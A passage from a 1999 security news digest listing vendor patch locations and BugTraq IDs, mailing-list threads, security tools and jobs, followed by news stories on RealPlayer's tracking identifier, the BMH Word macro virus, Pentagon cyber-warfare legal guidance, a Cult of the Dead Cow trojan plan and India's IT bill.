SRPMS/bind-8.2.2p3-1.src.rpm Red Hat Linux 4.x: Intel: ftp://updates.redhat.com/4.2/i386/bind-8.2.2_P3-0.4.2.i386.rpm ftp://updates.redhat.com/4.2/i386/bind-devel-8.2.2_P3-0.4.2.i386.rpm ftp://updates.redhat.com/4.2/i386/bind-utils-8.2.2_P3-0.4.2.i386.rpm Alpha: ftp://updates.redhat.com/4.2/alpha/bind-8.2.2_P3-0.4.2.alpha.rpm ftp://updates.redhat.com/4.2/alpha/bind-devel-8.2.2_P3-0.4.2.alpha.rpm ftp://updates.redhat.com/4.2/alpha/bind-utils-8.2.2_P3-0.4.2.alpha.rpm Sparc: ftp://updates.redhat.com/4.2/sparc/bind-8.2.2_P3-0.4.2.sparc.rpm ftp://updates.redhat.com/4.2/sparc/bind-devel-8.2.2_P3-0.4.2.sparc.rpm ftp://updates.redhat.com/4.2/sparc/bind-utils-8.2.2_P3-0.4.2.sparc.rpm Source packages: ftp://updates.redhat.com/4.2/SRPMS/bind-8.2.2_P3-0.4.2.src.rpm Red Hat Linux 5.x: Intel: 
ftp://updates.redhat.com/5.2/i386/bind-8.2.2_P3-0.5.2.i386.rpm ftp://updates.redhat.com/5.2/i386/bind-devel-8.2.2_P3-0.5.2.i386.rpm ftp://updates.redhat.com/5.2/i386/bind-utils-8.2.2_P3-0.5.2.i386.rpm Alpha: ftp://updates.redhat.com/5.2/alpha/bind-8.2.2_P3-0.5.2.alpha.rpm ftp://updates.redhat.com/5.2/alpha/bind-devel-8.2.2_P3-0.5.2.alpha.rpm ftp://updates.redhat.com/5.2/alpha/bind-utils-8.2.2_P3-0.5.2.alpha.rpm Sparc: ftp://updates.redhat.com/5.2/sparc/bind-8.2.2_P3-0.5.2.sparc.rpm ftp://updates.redhat.com/5.2/sparc/bind-devel-8.2.2_P3-0.5.2.sparc.rpm ftp://updates.redhat.com/5.2/sparc/bind-utils-8.2.2_P3-0.5.2.sparc.rpm Source packages: ftp://updates.redhat.com/5.2/SRPMS/bind-8.2.2_P3-0.5.2.src.rpm Red Hat Linux 6.x: Intel: ftp://updates.redhat.com/6.1/i386/bind-8.2.2_P3-1.i386.rpm ftp://updates.redhat.com/6.1/i386/bind-devel-8.2.2_P3-1.i386.rpm ftp://updates.redhat.com/6.1/i386/bind-utils-8.2.2_P3-1.i386.rpm Alpha: ftp://updates.redhat.com/6.0/alpha/bind-8.2.2_P3-1.alpha.rpm ftp://updates.redhat.com/6.0/alpha/bind-devel-8.2.2_P3-1.alpha.rpm ftp://updates.redhat.com/6.0/alpha/bind-utils-8.2.2_P3-1.alpha.rpm Sparc: ftp://updates.redhat.com/6.0/sparc/bind-8.2.2_P3-1.sparc.rpm ftp://updates.redhat.com/6.0/sparc/bind-devel-8.2.2_P3-1.sparc.rpm ftp://updates.redhat.com/6.0/sparc/bind-utils-8.2.2_P3-1.sparc.rpm Source packages: ftp://updates.redhat.com/6.1/SRPMS/bind-8.2.2_P3-1.src.rpm Vulnerability Patched: Multiple BIND Vulnerabilities BugTraq ID: 788 Relevant URLS: http://www.isc.org/products/BIND/bind-security-19991108.html http://www.securityfocus.com/bid/788 5. Vendor: Irfan Skiljan Product: IrfanView32 Patch Location: http://stud1.tuwien.ac.at/~e9227474/iview310.zip (version 3.1 or IrfanView32) Vulnerability Patched: IrfanView32 Image File Buffer Overflow Vulnerability BugTraq ID: 781 Relevant URLS: http://stud1.tuwien.ac.at/~e9227474/ http://www.securityfocus.com/bid/781 6. 
Vendor: Debian Product: GNU/Linux Patch Location: Source Packages: http://security.debian.org/dists/slink/updates/source/nfs-server_2.2beta37-1slink.1.diff.gz http://security.debian.org/dists/slink/updates/source/nfs-server_2.2beta37-1slink.1.dsc http://security.debian.org/dists/slink/updates/source/nfs-server_2.2beta37.orig.tar.gz Alpha: http://security.debian.org/dists/slink/updates/binary-alpha/nfs-server_2.2beta37-1slink.1_alpha.deb i386: http://security.debian.org/dists/slink/updates/binary-i386/nfs-server_2.2beta37-1slink.1_i386.deb m68k: http://security.debian.org/dists/slink/updates/binary-m68k/nfs-server_2.2beta37-1slink.1_m68k.deb Sparc: http://security.debian.org/dists/slink/updates/binary-sparc/nfs-server_2.2beta37-1slink.1_sparc.deb Vulnerability Patched: Linux nfsd Remote Buffer Overflow Vulnerability BugTraq ID: 782 Relevant URLS: http://www.securityfocus.com/bid/782 7. Vendor: Cobalt Networks Product: RaQ2 Patch Location: RaQ 3i (x86) RPM: ftp://ftp.cobaltnet.com/pub/experimental/secuirty/rpms/cgiwrap-pacifica-3.6.4.C5.i386.rpm SRPM: ftp://ftp.cobaltnet.com/pub/experimental/secuirty/srpms/cgiwrap-pacifica-3.6.4.C5.src.rpm RaQ 2 (MIPS) RPM: ftp://ftp.cobaltnet.com/pub/experimental/secuirty/rpms/cgiwrap-raq2-3.6.4.C5.mips.rpm SRPM: ftp://ftp.cobaltnet.com/pub/experimental/secuirty/srpms/cgiwrap-raq2-3.6.4.C5.src.rpm Vulnerability Patched: Cobalt RaQ2 cgiwrap Vulnerability BugTraq ID: 777 Relevant URLS: http://www.securityfocus.com/bid/777 8. Vendor: Microsoft Product: Outlook Patch Locations: http://windowsupdate.microsoft.com http://www.microsoft.com/msdownload http://www.microsoft.com/msdownload/iebuild/ascontrol/en/ascontrol.htm Vulnerability Patched: MS ActiveX CAB File Execution Vulnerability BugTraq ID: 775 Relevant URLS: http://www.microsoft.com/security http://www.securityfocus.com/bid/775 9. 
Vendor: Immunix
Product: StackGuard
Patch Locations: http://immunix.org/downloads.html (New version)
Vulnerability Patched: Immunix StackGuard Evasion Vulnerability
BugTraq ID: 786
Relevant URLS:
http://www.immunix.org
http://www.securityfocus.com/bid/786

10. Vendor: Ipswitch
Product: IMail
Patch Locations: ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/imail508.exe
Vulnerability Patched: IMail POP3 Buffer Overflow Denial of Service Vulnerability
BugTraq ID: 789
Relevant URLS:
http://www.ipswitch.com
http://www.securityfocus.com/bid/789

11. Vendor: Microsoft
Product: Windows NT
Patch Locations:
X86: http://download.microsoft.com/download/winntsrv40/Patch/Spooler-fix/NT4/EN-US/Q243649.exe
Alpha: http://download.microsoft.com/download/winntsrv40/Patch/Spooler-fix/ALPHA/EN-US/Q243649.exe
Vulnerabilities Patched: NT Spoolss.exe Buffer Overflow Vulnerabilities and NT Spoolss.exe DLL Insertion Vulnerability
BugTraq ID: 768/769
Relevant URLS:
http://www.microsoft.com/security
http://www.securityfocus.com/bid/768
http://www.securityfocus.com/bid/769

12. Vendor: Floosietek
Product: FTGate
Patch Location: http://www.floosietek.com/dl_ftg/download.htm (Download version 2.2)
Vulnerability Patched: FTGate Directory Traversal Vulnerability
BugTraq ID: 772
Relevant URLS:
http://www.floosietek.com
http://www.securityfocus.com/bid/772

13. Vendor: AN
Product: AN HTTPD
Patch Location: http://www.st.rim.or.jp/~nakata/ (version 1.21)
Vulnerability Patched: AN-HTTPd CGI Vulnerabilities
BugTraq ID: 762
Relevant URLS:
http://www.securityfocus.com/bid/762

14. Vendor: IBM
Product: HomePagePrint
Patch Location: http://www.ibm.co.jp/software/internet/hpgprt/down2.html
Vulnerability Patched: IBM HomePagePrint Buffer Overflow Vulnerability
BugTraq ID: 763
Relevant URLS:
http://www.securityfocus.com/bid/763

INCIDENTS SUMMARY 1999-11-02 to 1999-11-14
------------------------------------------

1.
possible trojan/virus issue solved (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-1&msg=382041CA.242F6E7D@netvision.net.il 2. port 109 (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-1&msg=01BF2624.A77B0A40.cholet@logilune.com 3. Re: Logging hosts (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-1&msg=Pine.LNX.4.10.9911072300170.29394-100000@mad.unix.kg 4. Mail-relaying probing (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-8&msg=14375.58989.252415.240801@cap-ferrat.albourne.com V. VULN-DEV RESEARCH LIST SUMMARY 1999-11-02 to 1999-11-14 ---------------------------------------------------------- 1. Re: FreeBSD listen() (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-1&msg=Pine.LNX.4.10.9911040724550.415-100000@mad.unix.kg 2. ssh-1.2.27 remote buffer overflow - exploitable (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-8&msg=19991109014853.3239.qmail@securityfocus.com 3. Re: thttpd 2.04 stack overflow (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-8&msg=199911100200.SAA05038@shell3.ba.best.com 4. MS Outlook javascript parsing bug (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-8&msg=38285E28.CBB524CE@enternet.se 5. Re: Open Port on Win98 box (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-8&msg=38299BCD.BE9B3E3A@thievco.com 6. minor (?) mc bug (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-8&msg=Pine.LNX.4.10.9911102253410.3886-100000@pa16.suwalki.ppp.tpnet.pl 7. 
[Fwd: [Fwd: ICQ 2000 trojan/worm (VD#5)]] (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-8&msg=382DA20D.9338A51D@thievco.com VI. SECURITY JOBS SUMMARY 1999-11-02 to 1999-11-14 --------------------------------------------------- Seeking Staff: 1. Information Security Consultant(s) - #111 - NY Reply to: Lori Sabat Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-1&msg=19991103184820.57.qmail@securityfocus.com 2. Information Security Analyst - #253 - NJ Reply to: Lori Sabat Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-1&msg=19991103185247.280.qmail@securityfocus.com 3. Sr Firewall Engineer Position Reply to: Lora Reidmiller Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-1&msg=3821B087.8ECC1A00@arlington.net 4. Sr. Mgr. Systems Security Reply to: Blomme, Sarah Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-1&msg=8625681F.0077E21A.00@smtp2.mcld.net 5. Security Sales Nationwide Reply to: Erik Voss Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-1&msg=017501bf270b$6774e1e0$6775010a@saratoga3 6. Sr. Mgr. Systems Security Reply to: Blomme, Sarah Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-1&msg=86256820.004BEF5A.00@smtp2.mcld.net 7. Software Engineer #4 - Atlanta, GA Reply to: Lori Sabat Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-8&msg=19991108194602.11673.qmail@securityfocus.com 8. Website password-protection scripts programmer needed Reply to: Katim S. Touray Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-8&msg=382A239F.5C32B0A8@fanafana.com VII. 
SECURITY SURVEY 1999-11-02 to 1999-11-14
----------------------------------------------

The question for 1999-11-02 to 1999-11-14 was:

Would you support a vendor that sued people who publicized bugs in their software? (Yes, this is happening!)

Results:

Yes  5% / 10 votes
No  94% / 174 votes

Total number of votes: 184 votes

VIII. SECURITY FOCUS TOP 6 TOOLS 1999-11-02 to 1999-11-14
--------------------------------------------------------

1. Security Focus Pager
by Security Focus
Relevant URL: http://www.securityfocus.com/pager

This program allows the user to monitor additions to the Security Focus website without constantly maintaining an open browser. Sitting quietly in the background, it polls the website at a user-specified interval and alerts the user via a blinking icon in the system tray, a popup message or both (also user-configurable).

2. Snort 1.3.1
by Martin Roesch (roesch@clark.net)
< http://www.clark.net/~roesch/security.html >
Platforms: FreeBSD, HP-UX, IRIX, Linux, MacOS, NetBSD, OpenBSD and Solaris

Snort is a libpcap-based packet sniffer/logger which can be used as a lightweight network intrusion detection system. It features rules-based logging and can perform content searching/matching in addition to being used to detect a variety of other attacks and probes, such as buffer overflows, stealth port scans, CGI attacks, SMB probes, and much more. Snort has a real-time alerting capability, with alerts being sent to syslog, a separate "alert" file, or even to a Windows computer via Samba.

3. BUGS 2.0.1
by Sylvain Martinez
< http://www.asi.fr/~martinez/crypto/bugs-2.0.1.tgz >
Platforms: HP-UX, Linux, Solaris, SunOS, UNIX, Windows 2000, Windows 3.x, Windows 95/98 and Windows NT

Strong private key cryptography algorithm and applications. Multiplatform (UNIX and Windows). Crypt/hide/key generator. Unlimited key length, source code available.

4.
NSS Narr0w Security Scanner
by Narrow NaRr0w@LeGiOn2000.cC
< http://www.wiretrip.net/rfp/1/index.asp >
Platforms: Perl (any system supporting perl)

Narr0w Security Scanner checks for 153 remote vulnerabilities. Written in perl.

5. cgi-check99 v0.3 0.3
by deepquest
< http://www.deepquest.pf >
Platforms: BSDI, BeOS, DOS, FreeBSD, HP-UX, IRIX, Linux, MacOS, NetBSD, OS/2, OpenBSD, OpenVMS, PalmOS, Solaris, SunOS, UNIX, VMS, Windows 2000, Windows 3.x, Windows 95/98, Windows CE and Windows NT

This is one of the world's most cross-platform CGI scanners, running on 37 operating systems! Even PalmOS soon! Will check for hundreds of common CGI and other remote issues. Plus it will report the Bugtraq ID of some vulnerabilities. Get the rebol interpreter at http://www.rebol.com.

6. guard
by ondrej suchy
< http://www.penguin.cz/~ondrej/guard/ >
Platforms: Linux

Guard is more an early warning system than an IDS. It scans system logs for signs of intrusion in real time. Produces colored output on the tty, sends alerts and regular reports. Database of suspicious strings included.

IX. SPONSOR INFORMATION -
------------------------------------------

URL: http://www.ntobjectives.com

NT OBJECTives, Inc. is a small company dedicated to building network security tools for the Windows NT platform. Our current line of tools is directed at security forensics. We base our designs around fast, visually intuitive interfaces with a sharp focus on making security analysis easy. This is the foundation of our tool line. Our goal is for each of our successive product builds to enhance previous capabilities so that you have a comprehensive set of tools at your disposal. We keep abreast of current trends, tools, and issues, so that we can bring you quality network tools

X. SUBSCRIBE/UNSUBSCRIBE INFORMATION
-------------------------------------

1. How do I subscribe?
Send an e-mail message to LISTSERV@SECURITYFOCUS.COM with a message body of:

SUBSCRIBE SF-NEWS Lastname, Firstname

You will receive a confirmation request message to which you will have to answer.

2. How do I unsubscribe?

Send an e-mail message to LISTSERV@SECURITYFOCUS.COM from the subscribed address with a message body of:

UNSUBSCRIBE SF-NEWS

If your email address has changed, email aleph1@securityfocus.com and I will manually remove you.

3. How do I disable mail delivery temporarily?

If you are simply going on vacation you can turn off mail delivery without unsubscribing by sending LISTSERV the command:

SET SF-NEWS NOMAIL

To turn back on e-mail delivery use the command:

SET SF-NEWS MAIL

4. Is the list available in a digest format?

Yes. The digest is generated once a day.

5. How do I subscribe to the digest?

To subscribe to the digest join the list normally (see section 0.2.1) and then send a message to LISTSERV@SECURITYFOCUS.COM with a message body of:

SET SF-NEWS DIGEST

6. How do I unsubscribe from the digest?

To turn the digest off send a message to LISTSERV with a message body of:

SET SF-NEWS NODIGEST

If you want to unsubscribe from the list completely follow the instructions of section 0.2.2 next.

7. I seem to not be able to unsubscribe. What is going on?

You are probably subscribed from a different address than that from which you are sending commands to LISTSERV. Either send email from the appropriate address or email the moderator to be unsubscribed manually.

@HWA

18.0 First RealJukebox Now RealPlayer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

Last week it was discovered that RealNetworks' software product RealJukebox transmitted a Global Unique Identifier that was used to track a user's listening habits. Now it seems that RealPlayer, the company's streaming video player, also transmits a GUID.
BBC
http://news.bbc.co.uk/hi/english/sci/tech/newsid_508000/508340.stm

Wired
http://www.wired.com/news/technology/0,1282,32350,00.html

BBC; Sci/Tech

New Real privacy flaw

Over 12 million people use the software to listen to their CDs

A new security flaw has been discovered in one of the most popular programs used to access music and video over the internet.

Software experts say a privacy glitch in RealNetworks' RealPlayer program means it could secretly collect information about its millions of users.

Earlier this week, RealNetworks apologised after it was revealed that its RealJukebox software suffered from a similar problem.

It subsequently issued a patch to remove a unique identification number from the software which tracks users' listening habits.

'Harder to fix'

The US security expert who discovered the original flaw, Richard Smith, says the glitch in RealPlayer could present a serious problem for the software company.

"It's harder to fix because the player has been around for years," Mr Smith, former president of Phar Lap Software, was quoted as saying.

RealNetworks controls around 85% of the streaming media market, with 69 million registered users of RealPlayer.

RealNetworks has yet to comment on the reports. But industry insiders say it is planning to release a new version of the software without the unique identification number.

Identifying users

The identifier is known as a globally unique identifier, or GUID. It transmits to the company's headquarters details about what music each customer listens to and how many songs are copied.

In the case of RealNetworks, the information sent includes a serial number that could be used to identify an individual.

One of RealPlayer's main rivals, Microsoft's Windows Media Player, also transmits an identifier. But the ID number cannot be linked to personal information as Microsoft does not require user registration.
The nonprofit group that monitors and enforces the corporate privacy policies of its members, TRUSTe, is planning to investigate whether RealNetworks had broken its privacy promises and whether its previous statement, which TRUSTe had vetted, was adequate.

Wired;

Real Damage Control -- Again
by Chris Oakes and Jennifer Sullivan

3:00 a.m. 6.Nov.1999 PST

RealNetworks has issued another software update that addresses a privacy concern, this time in its popular RealPlayer software.

The company posted a free beta of RealPlayer 7 on Monday, which it said no longer tracks personal user information.

Last Monday, RealNetworks had plugged a related privacy glitch in its RealJukebox music software. The patch removed from its RealJukebox software a unique identification number, which tracks users' listening habits.

Software analysis has shown that the same identifier is also transmitted by version 6 of the RealPlayer.

The unique identification numbers could be tied to personal information that is collected by RealNetworks during user registration. RealNetworks claims that more than 85 million people use the RealPlayer.

"It's harder for [RealNetworks] to fix [the RealPlayer problem], because the player has been around for years," said Richard Smith, who first pointed out the problem. "[Sites] are really using the [ID] numbers in a big way."

Smith pointed out that the RealPlayers currently in use will continue to transmit IDs until users upgrade their software. Smith regularly monitors the behavior of Internet software for security and privacy flaws.

The identifier is known as a globally unique identifier, or GUID, and is initiated during the RealPlayer registration process. The number is also transmitted when users access any site providing RealAudio or RealVideo streams.

The RealJukebox update was issued to stop the software from transmitting detailed information about the user's behavior to RealNetworks servers.
According to the company, GUIDs can no longer be associated with any personal information, such as name and email, provided during RealJukebox registration.

The RealPlayer, however, doesn't appear to track specific user behavior as RealJukebox did.

It is unclear how many versions of RealPlayer have transmitted the unique IDs.

RealNetworks' competitors include Microsoft's Windows Media Player, which users have downloaded 40 million times. A spokesman for Microsoft confirmed that the Windows Media Player, like other players, also transmits an identifier. But since Microsoft does not require user registration, the ID number cannot be tied to personal information.

"[The transmission of unique identifiers] shows there are all these ways you can leave these little digital fingerprints, and nobody has studied this in a systematic way," said Paul Schwartz, law professor at Brooklyn Law School and co-author of Data Privacy Law.

"We have to figure out what are the privacy implications," he said. "It's a great illustration of how we just find these things out as we go along."

@HWA

19.0 New Difficult To Kill Macro Virus Found
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by nvirb

A new macro virus known as BMH is proving difficult to kill, say Anti-Virus vendors. BMH not only infects the normal template like most other Macro viruses but also creates and infects SNrml.dot which it places in the Word Startup folder. This activates the virus every time MS Word is launched.

CNN
http://www.cnn.com/TECH/computing/9911/05/word97.virus.idg/index.html

New Word 97 macro virus discovered

November 5, 1999
Web posted at: 9:52 a.m. EST (1452 GMT)

by Matthew Nelson

(IDG) -- A new macro-based virus has been discovered, and is being described as the virus "that will not die until you put a stake in its heart" by anti-virus vendor Aladdin Knowledge Systems.
The latest macro virus to strike is a Microsoft Word 97 Macro virus called W97M.BMH, or simply BMH, which infects the global template or normal.dot of Word 97 and will infect every document opened or created on the infected system. This new virus is unique in that it not only infects the normal template but it creates a special file called SNrml.dot in the \Office\STARTUP directory. While macro viruses are fairly easy to create and more and more common, this one is different because the normal procedure for removing such viruses, cleaning the normal.dot file, does not work with BMH. This is because the virus continues to infect the system from the special SNrml.dot file, according to Eric Vasbinder, product marketing manager for Aladdin. "It won't die, it's the undead virus," Vasbinder said. "Most macro viruses tend to infect the normal.doc template only, but the BMH virus is unique in that it creates another .dot template and it saves it in the office start up directory." "As a result of that, even if you remove the virus from the normal.dot, it will come back. Every file that it's in the Office start up directory will be executed when Word starts up," Vasbinder added. "It will start up and reinfect the system once again." To remove the virus, it is necessary to remove both .dot files, Vasbinder said. Once the virus infects a system it will also set the macro virus warning system within Office to the lowest setting, enabling future virus infections. It will also alter the Word application so that when users try to activate features, a picture will be shown instead. "It prevents you from performing certain actions in Word. It will modify the word configuration files, so that certain menu options inside word are unavailable," Vasbinder said. "It will instead of activating that option, it will display a picture instead." No information was available regarding which functions were affected or what the picture was of, however. 
An Aladdin eSafe anti-virus user in the United States discovered the virus this week using the product's "Macro Terminator" technology, which scans for unauthorized macro file actions, according to the company.

Anti-virus users with heuristic scanning as part of their system will most likely already be protected, according to Aladdin, but users should always update their DAT files frequently.

@HWA

20.0 Do the Laws of War Apply in Cyberspace?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Space Rogue

Pentagon officials are worried how the laws of war apply in the electronic realm. The US feels that existing laws are adequate to control operations in this new theater and that practitioners of cyber war still need to worry about collateral damage to civilian systems. Officials have also warned about overreacting to attacks on US systems, stating that the intent or origin must first be clearly established before a counter cyber attack can be launched. (If anyone knows where to find the report mentioned in this article, "An Assessment of Legal Issues in Information Operations", I would like a copy.)

Washington Post
http://www.washingtonpost.com/wp-dyn/articles/A35345-1999Nov7.html

Late Update 1100EST

Several people were kind enough to send us the entire document as well as a link to a PDF version. (Warning, this is extremely dry reading.)

An Assessment of Legal Issues in Information Operations
http://www.terrorism.com/documents/dod-io-legal.pdf - via Terrorism Research Center

Washington Post;

Military Grappling With Rules for Cyber Warfare

By Bradley Graham
Washington Post Staff Writer
Monday, November 8, 1999; A1

During last spring's conflict with Yugoslavia, the Pentagon considered hacking into Serbian computer networks to disrupt military operations and basic civilian services.
But it refrained from doing so, according to senior defense officials, because of continuing uncertainties and limitations surrounding the emerging field of cyber warfare. "We went through the drill of figuring out how we would do some of these cyber things if we were to do them," said a senior military officer. "But we never went ahead with any." As computers revolutionize many aspects of life, military officials have stepped up development of cyber weapons and spoken ominously of their potential to change the nature of war. Instead of risking planes to bomb power grids, telephone exchanges or rail lines, for example, Pentagon planners envision soldiers at computer terminals silently invading foreign networks to shut down electrical facilities, interrupt phone service, crash trains and disrupt financial systems. But such attacks, officials say, pose nettlesome legal, ethical and practical problems. Midway through the war with Yugoslavia, the Defense Department's top legal office issued guidelines warning that misuse of cyber attacks could subject U.S. authorities to war crimes charges. It advised commanders to apply the same "law of war" principles to computer attack that they do to the use of bombs and missiles. These call for hitting targets that are of military necessity only, minimizing collateral damage and avoiding indiscriminate attacks. Defense officials said concern about legalities was only one of the reasons U.S. authorities resisted the temptation to, say, raid the bank accounts of Yugoslav President Slobodan Milosevic. Other reasons included the untested or embryonic state of the U.S. cyber arsenal and the rudimentary or decentralized nature of some Yugoslav systems, which officials said did not lend themselves to computer assault. U.S. forces did target some computers that controlled the Yugoslav air defense system, the officials said. 
But the attacks were launched from electronic jamming aircraft rather than over computer networks from ground-based U.S. keyboards. No plan for a cyber attack on Yugoslav computer networks ever reached the stage of a formal legal assessment, according to several defense officials familiar with the planning. And the 50 pages of guidelines, prepared by the Pentagon general counsel's office, were not drafted with the Yugoslav operation specifically in mind. But officials said the document, which has received little publicity, reflected the collective thinking of Defense Department lawyers about cyber warfare and marked the U.S. government's first formal attempt to set legal boundaries for the military's involvement in computer attack operations. It told commanders to remain wary of targeting institutions that are essentially civilian, such as banking systems, stock exchanges and universities, even though cyber weapons now may provide the ability to do so bloodlessly. In wartime, the document advised, computer attacks and other forms of what the military calls "information operations" should be conducted only by members of the armed forces, not civilian agents. It also stated that before launching any cyber assaults, commanders must carefully gauge potential damage beyond the intended target, much as the Pentagon now estimates the number of likely casualties from bomb attacks. While computer attacks may appear on the surface as a cleaner means of destroying targets – with less prospect for physical destruction or loss of life than dropping bombs – Pentagon officials say such views are deceiving. By penetrating computer systems that control the communications, transportation, energy and other basic services in a foreign country, cyber weapons can have serious cascading effects, disrupting not only military operations but civilian life, officials say. Other U.S. 
government agencies have sided with the Pentagon view that existing law and international accords are sufficient to govern information warfare. But Russia is challenging this view. Over the past year, Moscow has tried to gather support for a United Nations resolution calling for new international guidelines and the banning of particularly dangerous information weapons. In comments to the U.N. secretary general published last month, Russia warned that information operations "might lead to an escalation of the arms race." It said "contemporary international law has virtually no means of regulating the development and application of such a weapon." But the Russian initiative has drawn little backing. U.S. officials regard it as an attempt to forestall development of an area of weaponry in which Russia lags behind the United States. In a formal response rejecting the Russian proposal, the Clinton administration said any attempt now to draft overarching principles on information warfare would be premature. "First, you have extraordinary differences in the sophistication of various countries about this type of technology," said a State Department official involved in the issue. "Also, the technology changes so rapidly, which complicates efforts to try to define these things." Instead of turning cyber assaults into another arms control issue, the administration prefers to treat them internationally as essentially a law enforcement concern. U.S. officials have supported several efforts through the United Nations and other groups to facilitate international cooperation in tracking computer criminals and terrorists. For all the heightened attention to cyber warfare, defense specialists contend that there are large gaps between what the technology promises and what practitioners can deliver. "We certainly have some capabilities, but they aren't what I would call mature ones yet," a high-ranking U.S. military officer said. The full extent of the U.S. 
cyber arsenal is among the most tightly held national security secrets. But reports point to a broad range of weapons under development, including use of computer viruses or "logic bombs" to disrupt enemy networks, the feeding of false information to sow confusion and the morphing of video images onto foreign television stations to deceive.

Last month, the Pentagon announced it was consolidating plans for offensive as well as defensive cyber operations under the four-star general who heads the U.S. Space Command in Colorado Springs. But complicating large-scale computer attacks is the need for an extraordinary amount of detailed intelligence about a target's hardware and software systems. Commanders must know not just where to strike but be able to anticipate all the repercussions of an attack, officials said.

"A recurring theme in our discussions with military operators is, well, if we can drop a bomb on it, why can't we take it out by a computer network attack," said a senior Pentagon lawyer specializing in intelligence. "Well, you may be able to. However, you've got to go through a few hoops and make sure that when you're choosing an alternative method, you're still complying with the law of armed conflict and making sure collateral damage is limited."

In their guidelines document, titled "An Assessment of International Legal Issues in Information Operations," the Pentagon's lawyers warned of such unintended effects of computer attacks as opening the floodgates of a dam, causing an oil refinery in a populated area to explode in flames or triggering the release of radioactivity. They also mentioned the possibility of computer attacks spilling over into neutral or friendly nations and noted the legal limits on deceptive actions.

"It may seem attractive for a combatant vessel or aircraft to avoid being attacked by broadcasting the agreed identification signals for a medical vessel or aircraft, but such actions would be a war crime," said the document, which was first reported last week by defense analyst William M. Arkin in a column on The Washington Post's online service. "Similarly, it might be possible to use computer morphing techniques to create an image of the enemy's chief of state informing his troops that an armistice or cease-fire agreement had been signed. If false, this also would be a war crime."

The document also addressed questions about whether the United States would be any more justified in using cyber weapons if a foreign adversary first hacked into U.S. computer networks. The answer: It depends on the extent of damage. One complicating factor, the defense lawyers wrote, is the difficulty of being certain about the real source and intent of some cyber attacks, whose origin can easily be disguised.

In the case of Yugoslavia, U.S. military authorities were slow to put together a plan for conducting information operations. But one was eventually assembled and approved by the middle of the 78-day war, the high-ranking officer said. The plan involved many traditional information warfare elements – psychological operations, deception actions, electronic jamming of radar and radio signals – targeting not just Yugoslav military and police forces but Milosevic and his associates, the officer said. One tactic was to bombard the Yugoslav leadership with faxes and other forms of harassment.

21.0 cDc Has New Trojan Plans
     ~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by EvilWench

Plans are underway for the development of a new trojan by the Cult of the Dead Cow. This will supposedly be done by modifying commercial Remote Access software that would be wholly invisible to anti-virus software, even to those that can detect Back Orifice.
This was revealed by Sir Dystic of the Cult of the Dead Cow while speaking to UK firms in London. (Somehow we think that the author of this article completely misunderstood statements made by Sir Dystic.)

ZD Net
http://www.zdnet.co.uk/news/1999/44/ns-11255.html

News burst: Back Orifice author reveals new Trojan technique
Fri, 05 Nov 1999 14:15:00 GMT
Will Knight

The author of Back Orifice and a leading hacker at Cult of the Dead Cow has revealed plans to develop an ingenious new Trojan technique that has even got anti-virus experts impressed.

"I have been working on turning any piece of commercial software that provides remote access to a computer into an executable," discloses Sir Dystic, one of the hacker group's more prominent members. "It wouldn't be very difficult to configure it so that it would work behind the scenes and then how would anti-virus software that scans for things like Back Orifice be able to detect it?"

Sir Dystic made this revelation to ZDNet while visiting Britain to explain the concept of moral hacking to UK companies.

"Full story to follow." (unavailable at release time)

@HWA

22.0 India Set To Vote on 'CyberLaw' Bill
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Deepquest

The Information Technology Bill 1999 is set to be presented before India's Parliament at the end of November. The bill is said to facilitate electronic communication, trade, and commerce and prevent computer crime in the public and private sectors.

C|Net
http://news.cnet.com/news/0-1005-200-1429644.html?tag=st.ne.1005.thed.1005-200-1429644

India sends Net regulation bill to parliament
By Reuters
Special to CNET News.com
November 4, 1999, 9:55 a.m. PT

NEW DELHI--India's federal cabinet today approved for presentation to parliament a "cyber law" bill to facilitate electronic trade and commerce and to prevent computer crimes.

"The cabinet has approved the proposal to introduce the Information Technology Bill 1999 in the next session of parliament to facilitate electronic communication, trade, and commerce and prevent computer crime in public and private [domains]," the government said in a statement.

The next session of parliament is expected to convene from November 29 to December 23. A draft of the bill was ready early this year, but it could not be taken up in parliament following the collapse of the Bharatiya Janata Party-led coalition government in a confidence vote last April. The coalition won reelection in September-October elections.

The information technology bill will provide an outline for legal recognition of electronic records, the statement said. "The bill provides for a legal framework so that the information is not denied legal effect, validity, or enforceability solely on the ground that it is in form of electronic records," it said.

The bill draws tenets from the United Nations Commission on International Trade Law's model law on e-commerce, Utah and Illinois state laws on electronic and digital signatures, and the Electronic Transactions Act enacted by Singapore in June 1998, officials said.

@HWA

